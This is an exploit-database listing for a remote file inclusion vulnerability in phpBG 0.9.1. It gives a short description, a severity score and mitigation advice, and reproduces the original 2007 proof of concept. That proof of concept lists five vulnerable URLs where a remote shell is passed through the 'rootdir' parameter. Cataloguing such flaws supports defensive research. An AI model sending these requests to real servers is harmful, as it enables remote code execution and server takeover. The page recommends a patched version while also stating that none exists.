header-logo
Suggest Exploit
vendor:
phpBG
by:
GoLd_M = [Mahmood_ali]
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: phpBG
Affected Version From: phpBG 0.9.1
Affected Version To: phpBG 0.9.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

phpBG 0.9.1 (rootdir) Remote File Inclusion Vulnerability

The phpBG 0.9.1 application is vulnerable to remote file inclusion. The vulnerability allows an attacker to include arbitrary files from the server using the 'rootdir' parameter in various PHP scripts. This can lead to remote code execution and compromise the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of phpBG. Additionally, ensure that input validation and sanitization are implemented for user-supplied parameters in PHP scripts.
Source

Exploit-DB raw data:

# phpBG 0.9.1 (rootdir) Remote File Inclusion Vulnerability
# D.Script: http://phpbg.sourceforge.net/
# POC:
#   /intern/admin/other/backup.php?admin=1&rootdir=Shell
#   /intern/admin/?rootdir=Shell
#   /intern/clan/member_add.php?rootdir=Shell
#   /intern/config/key_2.php?rootdir=Shell
#   /intern/config/forum.php?rootdir=Shell
# Discovered by: GoLd_M = [Mahmood_ali]
# Thanx To : Tryag-Team & Asbmay's Group & All My Friends

# milw0rm.com [2007-08-29]